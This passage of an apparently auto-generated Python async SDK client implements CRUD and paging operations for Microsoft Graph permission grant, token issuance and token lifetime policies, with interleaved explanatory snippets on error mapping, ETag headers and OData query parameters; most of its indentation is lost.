                list_of_elem = cls(list_of_elem)
            return deserialized.odata_next_link or None, AsyncList(list_of_elem)

        async def get_next(next_link=None):
            request = prepare_request(next_link)

            pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                error = self._deserialize(models.odataerror, response)
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, model=error)

            return pipeline_response

        return AsyncItemPaged(
            get_next, extract_data
        )
    list_permission_grant_policies.metadata = {'url': '/policies/permissionGrantPolicies'}  # type: ignore
async def create_permission_grant_policies(
self,
body: "models.microsoftgraphpermissiongrantpolicy",
**kwargs
) -> "models.microsoftgraphpermissiongrantpolicy":
"""Create new navigation property to permissionGrantPolicies for policies.
Create new navigation property to permissionGrantPolicies for policies.
:param body: New navigation property.
:type body: ~identity_sign_ins.models.microsoftgraphpermissiongrantpolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphpermissiongrantpolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphpermissiongrantpolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphpermissiongrantpolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_permission_grant_policies.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'microsoftgraphpermissiongrantpolicy')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphpermissiongrantpolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_permission_grant_policies.metadata = {'url': '/policies/permissionGrantPolicies'} # type: ignore
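# Every operation in this class builds an error_map from HTTP status code to
# exception type, then calls map_error before raising HttpResponseError as the
# fallback. A hedged, self-contained reimplementation of that dispatch using
# stand-in exception classes (illustrative only, not the azure.core.exceptions
# source):

```python
class ClientAuthenticationError(Exception): ...
class ResourceNotFoundError(Exception): ...
class ResourceExistsError(Exception): ...
class HttpResponseError(Exception): ...

def map_error(status_code, response, error_map):
    # Raise the mapped exception for known status codes; for unmapped codes
    # fall through, letting the caller raise HttpResponseError itself.
    error_type = error_map.get(status_code)
    if error_type is not None:
        raise error_type(response)

# The same map the generated operations build before each request.
error_map = {
    401: ClientAuthenticationError,
    404: ResourceNotFoundError,
    409: ResourceExistsError,
}
```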
async def get_permission_grant_policies(
self,
permission_grant_policy_id: str,
select: Optional[List[Union[str, "models.Enum136"]]] = None,
expand: Optional[List[Union[str, "models.Enum137"]]] = None,
**kwargs
) -> "models.microsoftgraphpermissiongrantpolicy":
"""Get permissionGrantPolicies from policies.
Get permissionGrantPolicies from policies.
:param permission_grant_policy_id: key: id of permissionGrantPolicy.
:type permission_grant_policy_id: str
:param select: Select properties to be returned.
:type select: list[str or ~identity_sign_ins.models.Enum136]
:param expand: Expand related entities.
:type expand: list[str or ~identity_sign_ins.models.Enum137]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphpermissiongrantpolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphpermissiongrantpolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphpermissiongrantpolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_permission_grant_policies.metadata['url'] # type: ignore
path_format_arguments = {
'permissionGrantPolicy-id': self._serialize.url("permission_grant_policy_id", permission_grant_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphpermissiongrantpolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_permission_grant_policies.metadata = {'url': '/policies/permissionGrantPolicies/{permissionGrantPolicy-id}'} # type: ignore
async def update_permission_grant_policies(
self,
permission_grant_policy_id: str,
body: "models.microsoftgraphpermissiongrantpolicy",
**kwargs
) -> None:
"""Update the navigation property permissionGrantPolicies in policies.
Update the navigation property permissionGrantPolicies in policies.
:param permission_grant_policy_id: key: id of permissionGrantPolicy.
:type permission_grant_policy_id: str
:param body: New navigation property values.
:type body: ~identity_sign_ins.models.microsoftgraphpermissiongrantpolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_permission_grant_policies.metadata['url'] # type: ignore
path_format_arguments = {
'permissionGrantPolicy-id': self._serialize.url("permission_grant_policy_id", permission_grant_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'microsoftgraphpermissiongrantpolicy')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
update_permission_grant_policies.metadata = {'url': '/policies/permissionGrantPolicies/{permissionGrantPolicy-id}'} # type: ignore
async def delete_permission_grant_policies(
self,
permission_grant_policy_id: str,
if_match: Optional[str] = None,
**kwargs
) -> None:
"""Delete navigation property permissionGrantPolicies for policies.
Delete navigation property permissionGrantPolicies for policies.
:param permission_grant_policy_id: key: id of permissionGrantPolicy.
:type permission_grant_policy_id: str
:param if_match: ETag.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delete_permission_grant_policies.metadata['url'] # type: ignore
path_format_arguments = {
'permissionGrantPolicy-id': self._serialize.url("permission_grant_policy_id", permission_grant_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
delete_permission_grant_policies.metadata = {'url': '/policies/permissionGrantPolicies/{permissionGrantPolicy-id}'} # type: ignore
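# The delete operations accept an optional if_match ETag and only emit the
# If-Match header when one is supplied, so a call without an ETag performs an
# unconditional delete. A small sketch of that header construction (hypothetical
# helper name; the generated code inlines this logic):

```python
def build_delete_headers(if_match=None, accept="application/json"):
    # Mirror the generated operations: send If-Match only when an ETag is
    # given; Accept is always sent.
    headers = {}
    if if_match is not None:
        headers["If-Match"] = if_match
    headers["Accept"] = accept
    return headers
```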
def list_token_issuance_policies(
self,
orderby: Optional[List[Union[str, "models.Enum144"]]] = None,
select: Optional[List[Union[str, "models.Enum145"]]] = None,
expand: Optional[List[Union[str, "models.Enum146"]]] = None,
**kwargs
) -> AsyncIterable["models.collectionoftokenissuancepolicy"]:
"""Get tokenIssuancePolicies from policies.
Get tokenIssuancePolicies from policies.
:param orderby: Order items by property values.
:type orderby: list[str or ~identity_sign_ins.models.Enum144]
:param select: Select properties to be returned.
:type select: list[str or ~identity_sign_ins.models.Enum145]
:param expand: Expand related entities.
:type expand: list[str or ~identity_sign_ins.models.Enum146]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator-like instance of either collectionoftokenissuancepolicy or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_sign_ins.models.collectionoftokenissuancepolicy]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.collectionoftokenissuancepolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_token_issuance_policies.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('collectionoftokenissuancepolicy', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.odataerror, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_token_issuance_policies.metadata = {'url': '/policies/tokenIssuancePolicies'} # type: ignore
async def create_token_issuance_policies(
self,
body: "models.microsoftgraphtokenissuancepolicy",
**kwargs
) -> "models.microsoftgraphtokenissuancepolicy":
"""Create new navigation property to tokenIssuancePolicies for policies.
Create new navigation property to tokenIssuancePolicies for policies.
:param body: New navigation property.
:type body: ~identity_sign_ins.models.microsoftgraphtokenissuancepolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphtokenissuancepolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphtokenissuancepolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphtokenissuancepolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_token_issuance_policies.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'microsoftgraphtokenissuancepolicy')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphtokenissuancepolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_token_issuance_policies.metadata = {'url': '/policies/tokenIssuancePolicies'} # type: ignore
async def get_token_issuance_policies(
self,
token_issuance_policy_id: str,
select: Optional[List[Union[str, "models.Enum147"]]] = None,
expand: Optional[List[Union[str, "models.Enum148"]]] = None,
**kwargs
) -> "models.microsoftgraphtokenissuancepolicy":
"""Get tokenIssuancePolicies from policies.
Get tokenIssuancePolicies from policies.
:param token_issuance_policy_id: key: id of tokenIssuancePolicy.
:type token_issuance_policy_id: str
:param select: Select properties to be returned.
:type select: list[str or ~identity_sign_ins.models.Enum147]
:param expand: Expand related entities.
:type expand: list[str or ~identity_sign_ins.models.Enum148]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphtokenissuancepolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphtokenissuancepolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphtokenissuancepolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_token_issuance_policies.metadata['url'] # type: ignore
path_format_arguments = {
'tokenIssuancePolicy-id': self._serialize.url("token_issuance_policy_id", token_issuance_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphtokenissuancepolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_token_issuance_policies.metadata = {'url': '/policies/tokenIssuancePolicies/{tokenIssuancePolicy-id}'} # type: ignore
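# The list-valued OData options ($select, $expand, $orderby) are serialized by
# comma-joining their elements, which is what the div=',' argument to
# self._serialize.query requests above. A sketch of the resulting query-string
# construction (hypothetical helper name; omitted options stay absent rather
# than being sent empty):

```python
def build_odata_query(select=None, expand=None, orderby=None):
    # Comma-join each list-valued option, skipping any left as None, as the
    # generated operations do before issuing the GET.
    params = {}
    if orderby is not None:
        params["$orderby"] = ",".join(orderby)
    if select is not None:
        params["$select"] = ",".join(select)
    if expand is not None:
        params["$expand"] = ",".join(expand)
    return params
```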
async def update_token_issuance_policies(
self,
token_issuance_policy_id: str,
body: "models.microsoftgraphtokenissuancepolicy",
**kwargs
) -> None:
"""Update the navigation property tokenIssuancePolicies in policies.
Update the navigation property tokenIssuancePolicies in policies.
:param token_issuance_policy_id: key: id of tokenIssuancePolicy.
:type token_issuance_policy_id: str
:param body: New navigation property values.
:type body: ~identity_sign_ins.models.microsoftgraphtokenissuancepolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_token_issuance_policies.metadata['url'] # type: ignore
path_format_arguments = {
'tokenIssuancePolicy-id': self._serialize.url("token_issuance_policy_id", token_issuance_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'microsoftgraphtokenissuancepolicy')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
update_token_issuance_policies.metadata = {'url': '/policies/tokenIssuancePolicies/{tokenIssuancePolicy-id}'} # type: ignore
async def delete_token_issuance_policies(
self,
token_issuance_policy_id: str,
if_match: Optional[str] = None,
**kwargs
) -> None:
"""Delete navigation property tokenIssuancePolicies for policies.
Delete navigation property tokenIssuancePolicies for policies.
:param token_issuance_policy_id: key: id of tokenIssuancePolicy.
:type token_issuance_policy_id: str
:param if_match: ETag.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delete_token_issuance_policies.metadata['url'] # type: ignore
path_format_arguments = {
'tokenIssuancePolicy-id': self._serialize.url("token_issuance_policy_id", token_issuance_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
delete_token_issuance_policies.metadata = {'url': '/policies/tokenIssuancePolicies/{tokenIssuancePolicy-id}'} # type: ignore
def list_token_lifetime_policies(
self,
orderby: Optional[List[Union[str, "models.Enum149"]]] = None,
select: Optional[List[Union[str, "models.Enum150"]]] = None,
expand: Optional[List[Union[str, "models.Enum151"]]] = None,
**kwargs
) -> AsyncIterable["models.collectionoftokenlifetimepolicy"]:
"""Get tokenLifetimePolicies from policies.
Get tokenLifetimePolicies from policies.
:param orderby: Order items by property values.
:type orderby: list[str or ~identity_sign_ins.models.Enum149]
:param select: Select properties to be returned.
:type select: list[str or ~identity_sign_ins.models.Enum150]
:param expand: Expand related entities.
:type expand: list[str or ~identity_sign_ins.models.Enum151]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator-like instance of either collectionoftokenlifetimepolicy or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_sign_ins.models.collectionoftokenlifetimepolicy]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.collectionoftokenlifetimepolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_token_lifetime_policies.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('collectionoftokenlifetimepolicy', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.odataerror, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_token_lifetime_policies.metadata = {'url': '/policies/tokenLifetimePolicies'} # type: ignore
async def create_token_lifetime_policies(
self,
body: "models.microsoftgraphtokenlifetimepolicy",
**kwargs
) -> "models.microsoftgraphtokenlifetimepolicy":
"""Create new navigation property to tokenLifetimePolicies for policies.
Create new navigation property to tokenLifetimePolicies for policies.
:param body: New navigation property.
:type body: ~identity_sign_ins.models.microsoftgraphtokenlifetimepolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphtokenlifetimepolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphtokenlifetimepolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphtokenlifetimepolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_token_lifetime_policies.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'microsoftgraphtokenlifetimepolicy')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphtokenlifetimepolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_token_lifetime_policies.metadata = {'url': '/policies/tokenLifetimePolicies'} # type: ignore
async def get_token_lifetime_policies(
self,
token_lifetime_policy_id: str,
select: Optional[List[Union[str, "models.Enum152"]]] = None,
expand: Optional[List[Union[str, "models.Enum153"]]] = None,
**kwargs
) -> "models.microsoftgraphtokenlifetimepolicy":
"""Get tokenLifetimePolicies from policies.
Get tokenLifetimePolicies from policies.
:param token_lifetime_policy_id: key: id of tokenLifetimePolicy.
:type token_lifetime_policy_id: str
:param select: Select properties to be returned.
:type select: list[str or ~identity_sign_ins.models.Enum152]
:param expand: Expand related entities.
:type expand: list[str or ~identity_sign_ins.models.Enum153]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphtokenlifetimepolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphtokenlifetimepolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphtokenlifetimepolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_token_lifetime_policies.metadata['url'] # type: ignore
path_format_arguments = {
'tokenLifetimePolicy-id': self._serialize.url("token_lifetime_policy_id", token_lifetime_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphtokenlifetimepolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_token_lifetime_policies.metadata = {'url': '/policies/tokenLifetimePolicies/{tokenLifetimePolicy-id}'} # type: ignore
async def update_token_lifetime_policies(
self,
token_lifetime_policy_id: str,
body: "models.microsoftgraphtokenlifetimepolicy",
**kwargs
) -> None:
"""Update the navigation property tokenLifetimePolicies in policies.
        Update the navigation property tokenLifetimePolicies in policies.

        :param token_lifetime_policy_id: key: id of tokenLifetimePolicy.
        :type token_lifetime_policy_id: str
        :param body: New navigation property values.
        :type body: ~identity_sign_ins.models.microsoftgraphtokenlifetimepolicy
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"

        # Construct URL
        url = self.update_token_lifetime_policies.metadata['url']  # type: ignore
        path_format_arguments = {
            'tokenLifetimePolicy-id': self._serialize.url("token_lifetime_policy_id", token_lifetime_policy_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        body_content_kwargs = {}  # type: Dict[str, Any]
        body_content = self._serialize.body(body, 'microsoftgraphtokenlifetimepolicy')
        body_content_kwargs['content'] = body_content
        request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(models.odataerror, response)
            raise HttpResponseError(response=response, model=error)

        if cls:
            return cls(pipeline_response, None, {})

    update_token_lifetime_policies.metadata = {'url': '/policies/tokenLifetimePolicies/{tokenLifetimePolicy-id}'}  # type: ignore

    async def delete_token_lifetime_policies(
        self,
        token_lifetime_policy_id: str,
        if_match: Optional[str] = None,
        **kwargs
    ) -> None:
        """Delete navigation property tokenLifetimePolicies for policies.

